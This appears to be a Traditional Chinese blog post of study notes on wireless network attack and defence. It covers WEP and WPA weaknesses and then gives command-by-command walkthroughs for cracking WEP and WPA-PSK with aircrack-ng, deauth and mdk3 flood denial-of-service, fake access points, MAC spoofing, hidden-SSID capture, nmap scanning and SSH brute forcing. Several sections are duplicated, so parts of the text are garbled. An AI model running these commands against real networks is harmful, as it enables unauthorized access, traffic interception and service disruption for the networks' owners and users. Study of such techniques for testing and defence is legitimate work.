1.無線網路的組成:
(1)基本服務單元(BSS):由一個無線網路橋接器的涵蓋區域所組成。
(2)網站(Station):通常指無線用戶端。
(3)接入點(AP):既有普通有線接入點的能力,又有接入到上一層網路的能力。
(4)延伸服務單元(ESS):由分配系統和BSS所組成。
2.無線網路運作原理:
無線網路的設置至少需要一個 AP,和一個或以上的無線用戶端。AP 每 100ms 將 SSID 經由 Beacons(信號台)封包廣播一次,無線用戶端可以藉此決定是否要和這一個 SSID 的 AP 連接。
3.相關術語簡介:
SSID:服務集識別字。標示某一無線區域網路的唯一識別碼。無線用戶端用它進入網路後與 AP 進行通訊。
WAP:無線應用協議。利用它可以把網路上的資訊傳送到行動電話或其他無線通訊終端上。
EAP:為一種用於驗證網路設備身份的機制。
二、無線網路加密與搭建
1.WEP 包括一個簡單的應答認證協定和一個加密協定。兩者均使用 RC4 的加密演算法。WEP 還包括 ICV 校驗機制,其目的是用來保護資訊不在傳輸過程中被修改。
WEP 加密網路上傳輸的資料,只讓預定接收物件訪問。WEP 用「金鑰」給資料編碼,再透過無線電波發送出去。
2.WEP漏洞包括:
(1)認證機制可透過異或的方式破解。
(2)認證為單向,AP 能認證用戶端,但用戶端不能認證 AP。
(3)初始向量(IV)太短,重用很快,為攻擊者提供很大的方便。
(4)RC4 有弱金鑰的問題,WEP 無避免措施。
(5)WEP 無法應付重傳攻擊(ReplayAttack)。
(6)ICV 有可能在傳輸資料時被修改而沒被檢測到。
(7)沒有金鑰管理、更新、分發機制,均需透過手工設定。
3.WPA 透過使用 TKIP 協定解決 WEP 的安全問題。使用的金鑰與網路上每台設備的 MAC 位址及一個更大的初始化向量合併,來確保每一節點均使用一個不同的金鑰流對其資料進行加密,隨後 TKIP 也會使用 RC4 對資料進行加密。
WPA 也包括完整性檢查功能,以確信金鑰尚未受到攻擊,同時加強用戶認證功能,並包含對 802.1x 和 EAP 的支援,能使得 WPA 既可透過外部 Radius(撥入使用者遠端驗證)服務隊無線使用者進行認證,也可在大網路中使用 Radius 協定自動更改和分配金鑰。
三、WEP 金鑰的加密與攻防
1.破解 WEP 加密實戰:
步驟一:載入無線網卡
- ifconfig -a -> 顯示主機所有網路介面。
- ifconfig wlan0 up -> 載入網卡。
- iwconfig -> 顯示無線網路卡及其狀態。
步驟二:啟動無線網卡至監聽模式(monitor)
- airmon-ng start wlan0
步驟三:偵測無線網路,抓取無線資料封包
- airodump-ng mon0 -> 偵測周圍無線網路概況。
mon0:已載入並啟動監聽模式的無線網卡。
- airodump-ng --ivs -c x -w y mon0 -> 抓取無線資料封包。
-c:設置 AP 的工作頻道。
x:頻道的數字。
-w:寫入檔案。檔名將從 x-01.ivs開始。
y:將抓取的資料封包保存的檔案名稱。
步驟四:對目標 AP 使用 ArpRequest 注入攻擊
- aireplay-ng -3 -b AP的mac -h 被攻擊方的mac mon0
*若被攻擊的無線客戶端未進行大流量的傳輸,可透過 ArpRequest 來讀取 ARP 請求報文,並偽造報文再次重發出去,以促進 ARP 產生更多資料封包。簡言之可加快破解過程。
*此操作需另開啓一 Shell 來進行加速破解。
步驟五:打開 Aircrack-ng,開始破解 WEP
- aircrack-ng 擷取的ivs文件.ivs
2.使用工具 SpoonWEP2 破解 WEP 加密:
自行參閱:使用 SpoonWEP 破解无线上网密码图文教程
四、WPA 的加密與攻防
1.破解 WPA-PSK 加密實戰:
步驟一:載入無線網卡
- ifconfig -a -> 顯示主機所有網路介面。
- ifconfig wlan0 up -> 載入網卡。
- iwconfig -> 顯示無線網路卡及其狀態。
步驟二:啟動無線網卡至監聽模式(monitor)
- airmon-ng start wlan0
步驟三:偵測無線網路,抓取無線資料封包
- airodump-ng -c x -w y mon0 -> 抓取無線資料封包。
x:頻道的數字。
-w:寫入檔案。檔名將從 x-01.cap開始。
y:將抓取的資料封包保存的檔案名稱。
步驟四:進行 Deauth 攻擊加速破解過程
- aireplay-ng -0 x -a AP的mac -c 被攻擊方的mac mon0
x:攻擊次數,可設置5~10不等。
*透過傳送 Deauth 資料封包,將已經連接至 AP 的合法用戶端強制斷開,此時,用戶端會自動重新連接 AP,駭客便有機會擷取到包含 WPA-PSK 握手驗證的完整資料封包。
*此操作需另開啓一 Shell 來進行加速破解。
步驟五:開始破解 WPA-PSK
- aircrack-ng -w dic 擷取的cap文件.cap
dic:你預先製作或下載好的字典路徑。
2.使用工具 Cowpatty 破解 WPA-PSK 加密:
3.使用工具 Crunch 製作字典:
自行參閱:Crunch使用
4.使用工具 SpoonWPA 破解 WPA-PSK 加密:
自行參閱:SPOONWPA破解无线上网
五、無線網路攻防技能必備
1.突破 MAC 地址過濾原理:
(1)獲得合法用戶端 MAC。
(2)更改 MAC 來偽造身份。
(3)重新載入網卡。
(4)連接無線 AP。
2.獲得合法用戶端 MAC:
方法一:透過 Airodump-ng 抓取封包,即可獲得目前連接至該 AP 的合法無線用戶端 MAC。
方法二:使用工具 WildPackets OmniPeek,自行參閱:并不彻底的MAC地址过滤 (第2、3頁)
(1)獲得合法用戶端 MAC。
(2)更改 MAC 來偽造身份。
(3)重新載入網卡。
(4)連接無線 AP。
2.獲得合法用戶端 MAC:
方法一:透過 Airodump-ng 抓取封包,即可獲得目前連接至該 AP 的合法無線用戶端 MAC。
方法二:使用工具 WildPackets OmniPeek,自行參閱:并不彻底的MAC地址过滤 (第2、3頁)
6.何謂 SSID:
SSID 就是無線網路的名稱,用來區分不同的無線網路而設置。當你搜尋到周圍的無線信號時,主要原因是因為對方的 AP 開啓了 SSID 廣播。
7.截獲已關閉的 SSID, Deauth 攻擊法:
透過發送 Deauth 攻擊資料封包,可迫使 AP 與合法用戶端之間斷開連接。對於已關閉 SSID 廣播的 AP,由於原本連接的合法無線用戶端會嘗試與 AP 再次建立連接,此時無線偵測即可截獲重新連接時吳獻資料封包中的 SSID 標識,換句話說,也就使得禁用廣播的 SSID 重現原型。
步驟一:打開 Airodump-ng 進行無線偵測,若 AP 有關閉 SSID,則該 AP 只會顯示其 SSID 的長度。
步驟二:發送 Deauth 資料封包,迫使 AP 與已連接無線用戶端斷開連接。
x:攻擊次數,可設置5~10不等。
步驟三:回到 Airodump-ng 介面上即可顯示其 SSID,以便進行破解 WEP 或 WPA。
透過發送 Deauth 攻擊資料封包,可迫使 AP 與合法用戶端之間斷開連接。對於已關閉 SSID 廣播的 AP,由於原本連接的合法無線用戶端會嘗試與 AP 再次建立連接,此時無線偵測即可截獲重新連接時吳獻資料封包中的 SSID 標識,換句話說,也就使得禁用廣播的 SSID 重現原型。
步驟一:打開 Airodump-ng 進行無線偵測,若 AP 有關閉 SSID,則該 AP 只會顯示其 SSID 的長度。
步驟二:發送 Deauth 資料封包,迫使 AP 與已連接無線用戶端斷開連接。
- aireplay-ng -0 x -a AP的mac -c 被攻擊方的mac mon0
x:攻擊次數,可設置5~10不等。
步驟三:回到 Airodump-ng 介面上即可顯示其 SSID,以便進行破解 WEP 或 WPA。
8.截獲已關閉的 SSID,抓封包分析法:
方法一:tcpdump -n -e -vvv -i ath1
-e:在輸出行列印出資料連接層的標頭資訊。
-vvv:輸出特別詳細的報文資訊。
ath1:對應的無線網路卡。
方法二:使用工具 Ethereal,自行參閱:Ethereal 抓網路封包+封包內容分析+看明碼連線內容
-e:在輸出行列印出資料連接層的標頭資訊。
-vvv:輸出特別詳細的報文資訊。
ath1:對應的無線網路卡。
方法二:使用工具 Ethereal,自行參閱:Ethereal 抓網路封包+封包內容分析+看明碼連線內容
方法三:使用工具 Wireshark,自行參閱:Wireshark 下載與安裝使用教學(此為文件檔)
方法四:使用工具 NetStumbler,自行參閱:三分钟教你破解隐藏SSID无线网络(自第2頁至第5頁)
方法五:使用工具 DD-WRT,自行參閱:三分钟教你破解隐藏SSID无线网络(第5頁、第6頁)
方法五:使用工具 DD-WRT,自行參閱:三分钟教你破解隐藏SSID无线网络(第5頁、第6頁)
9.何謂 DHCP:
DHCP 即動態主機設定通訊協定。主要目的是自動分配事先指定的 IP 位址給發出請求的用戶端,這些用戶端在沒有連線的情況下曾經使用的 IP 位址將被伺服器收回,並重新發送給其他請求的用戶端。
一旦 AP 上的 DHCP 服務被關閉,就不會再提供 IP 位址自動分配,因此無法得知內部 IP 位址,便無法與該 AP 建立連接。
駭客要突破 DHCP 的限制,意味著要獲取目標 AP 的內部網路所使用的 IP 位址或範圍。此時可透過 OmniPeek 進行無線偵測,也可透過 Airodump-ng 進行截獲。
而在使用 OmniPeek 等工具進行偵測前,仍須先破解 WEP 或 WPA 密碼,再對無線加密資料封包進行解密。
10.無用戶端 Chopchop 的攻防:
自行參閱:攻击WEP加密无线网络(3)
11.無用戶端 Fragment 的攻防:
自行參閱:攻击WEP加密无线网络(4)
12.偽裝成合法 AP 的方法:
駭客透過採用偽造 MAC 或修改 SSID 等方式,使得合法用戶端在不知情時連接到此 AP,從而達到轉發用戶端網路連接請求,以便截獲其中內容的目的。
可透過購買支援 Soft AP 的無線網路卡實踐,或是透過修改自己架設 AP 的 MAC 位址。
13.發射偽造的 AP 信號:
- mdk3 mon0 b -g -c x -h 7 -s y
b:用於偽造 AP 時使用的模式。
-g:偽裝成提供 54M 即滿足 802.11g 標準的無線網路。
x:針對的無線工作頻道數字。
-h 7:提升攻擊效率,可不使用。
-s y:發射封包的速率。每秒 y 個封包。
*使用 mdk3 之前,一定要將無線網卡啟動為監聽模式 。
14.發射偽造的 SSID 信號:
- mdk3 mon0 b -n x -g -c y -s z
b:用於偽造 AP 時使用的模式。
-n:使用指定的 SSID 來替代隨機產生的 SSID,此參數使得供給更有針對性。
x:欲指定的 SSID 標籤。
-g:偽裝成提供 54M 即滿足 802.11g 標準的無線網路。
y:針對的無線工作頻道數字。
-s z:發射封包的速率。每秒 z 個封包。
*使用 mdk3 之前,一定要將無線網卡啟動為監聽模式 。
六、無線網路加密資料解碼與分析
1.截獲無線資加密資料:
- airodump-ng -c x -w y mon0
-c:設置 AP 的工作頻道。
x:頻道的數字。
-w:寫入檔案。檔名將從 x-01.cap開始。
y:將抓取的資料封包保存的檔案名稱。
x:頻道的數字。
-w:寫入檔案。檔名將從 x-01.cap開始。
y:將抓取的資料封包保存的檔案名稱。
2.對截獲的無線加密資料封包解密:
步驟一:導入加密資料報文至 Cain
步驟二:使用工具 Cain 對無限加密資料封包進行解密
自行參閱:Cain and Abel 使用教程
步驟三:使用工具 Wireshark 查看解密完成後的無線加密檔
自行參閱:tcpdump与wireshark在测试中过程中的使用(後段)
3.使用工具 Wireshark 分析論壇帳號與密碼:
自行參閱:wireshark教學-http
4.使用工具 Wireshark 分析 Telnet 互動資料:
自行參閱:wireshark 抓取 telnet登录用户名和密码
5.使用工具 Wireshark 分析 Web 互動資料:
自行參閱:基于Wireshark的网页浏览行为分析(自第六頁起)
七、無線網路 D.O.S 攻擊與防範
1.Auth Flood 攻擊:
攻擊針對那些處於透過驗證、和 AP 建立關聯的關聯用戶端,攻擊者將向 AP 發送大量偽造的身份驗證服務和狀態碼,當請求超過 AP 所能承受時,AP 將斷開所有已連接之用戶。
2.進行 Auth Flood 攻擊:
- mdk3 mon0 a -a x -s y
-a:攻擊指定的 AP。若不使用此參數,將會對所有網路進行無差別攻擊。
x:AP 的 MAC 位址。
-s y:發射封包的速率。每秒 y 個封包。
*使用 mdk3 之前,一定要將無線網卡啟動為監聽模式 。
2.Deauth 攻擊:
旨在透過欺騙從 AP 到用戶端單播地址的取消身分驗證,以將用戶端轉為未關聯/未驗證的狀態。
3.進行 Deauth 攻擊:
- mdk3 mon0 d -c x -s y
-c x:針對的無線網路工作頻道數字,若要針對多個,則以逗號隔開。
-s y:發射封包的速率。每秒 y 個封包。
-w:file 白名單模式,檔案中的 MAC 會在攻擊中回避。
-b:file 黑名單模式,攻擊檔案中的 MAC 清單。
*使用 mdk3 之前,一定要將無線網卡啟動為監聽模式 。
4.Association Flood 攻擊:
透過利用大量模仿和偽造的無線用戶端關聯,來填充 AP 的用戶端關聯表,以達到淹沒 AP 的目的。一旦用戶關聯表溢出後,合法無線用戶端將無法再關聯。
5.Disassociation Flood 攻擊:
透過欺騙從 AP 到用戶端的取消關聯來強制用戶成為未關聯/未認證的狀態。一般來說,在攻擊者發送另一個取消關聯之前,用戶端會重新關聯以再次獲得服務。攻擊者反覆欺騙取消關聯才能使用戶端持續拒絕服務。
八、從無線網路滲透內部網路
1.使用工具 NMAP 掃描器:
(1)判斷主機是否在線上:
- nmap -sP IP
-sP:Ping 掃描。
- nmap -vv -sS IP
-sS:以 SYN 半開式掃描,將使結果更精確。
(3)服務版本識別:
- nmap -vv -sV IP
-sV:偵測詳細的服務版本號。
(4)作業系統判斷:
- nmap -O IP
2.使用工具 Zenmap 掃描器:
自行參閱:Zenmap網路偵測工具
3.使用工具 AMAP 掃描器:
(1)服務版本探查:
- amap -B IP port
- amap -b IP port
- amap -v -b IP port
4.使用工具 Hping2 掃描器:
- hping2 -A/F/S IP
-F:設置 FIN 標誌位元。
-S:設置 SYN 標誌位元。
5.使用工具 Hydra 破解密碼:
自行參閱:暴力破解工具-Hydra 7.3
6.使用工具 BruteSSH 破解密碼:
- ./brutessh.py -h ip -u x -d y
-u x:帳號名稱。
-d y:字典位置。
7.緩衝區溢位:
駭客會向緩衝區內填充資料,而當資料長度超過緩衝區本身的容量後,資料就會溢出儲存空間,裝不下的資料則會覆蓋在合法的資料上,導致程式崩潰。
8.使用工具 Metasploit 進行緩衝區溢位攻擊:
自行參閱:Metasploit Framework应用实例:代码漏洞攻击
九、無線路由器攻防實戰
1.WPS:為一硬體加密設置,使用PIN碼或按鍵,即可同步無線網卡的設定。
2.掃描開啟 WPS 功能的無線設備:
- ./wpscan.py -i mon0
3.監測 WPS 狀態:
- wpspy.py -i mon0 SSID
*須先將無線網卡啟動為監聽模式 。
十、Wireless VPN 攻防實戰
1.VPN 為虛擬私人網路,主要包含以下組件:
(1)虛擬私人網路(VPN)伺服器:可設定 VPN 伺服器以提供對整個網路的訪問,或限制僅可訪問作為 VPN 伺服器的電腦資源。
(2)VPN 用戶端:是獲得遠端存取 VPN 連接的個人用戶或獲得路由器到路由器 VPN 連接的電腦。
(3)LAN、遠端存取及隧道協議:應用程式使用 LAN 協定傳輸通訊。遠端存取協議用於協商連接,並為透過廣域網路連接發送的 LAN 協定資料提供組幀。隧道協議是為了進行身分驗證、加密及資料壓縮。
2.無線 VPN 的安全建議:
把無線 AP 放入企業內部的某一網段中,並將這一網段用防火牆保護起來,防止內部網的其他部分與無線 AP 連接;然後讓所有的無線客戶使用虛擬私人網路軟體。
3.攻擊 PPTP VPN:
自行參閱:无线PPTP VPN攻击
4.攻擊啟用 IPSec 加密的 VPN:
自行參閱:IPsec VPN攻击
十一、藍牙安全
1.藍牙採用分散式網路結構以及快跳頻和短包技術,支援點對點及點對多點通訊。
2.識別藍牙設備:
- hcionfig
3.啟動藍牙設備:
- hciconfig hci0 up
4.查看藍牙設備相關內容:
- hciconfig hci0 class
5.掃描藍牙設備:
- hcitool -i hci0 scan
6.修改藍牙設備位址:
- bdaddr -i hci0 x
7.藍牙攻擊:
自行參閱:漏洞利用步骤
8.藍牙 D.O.S:
自行參閱:蓝牙D.O.S实战
沒有留言:
張貼留言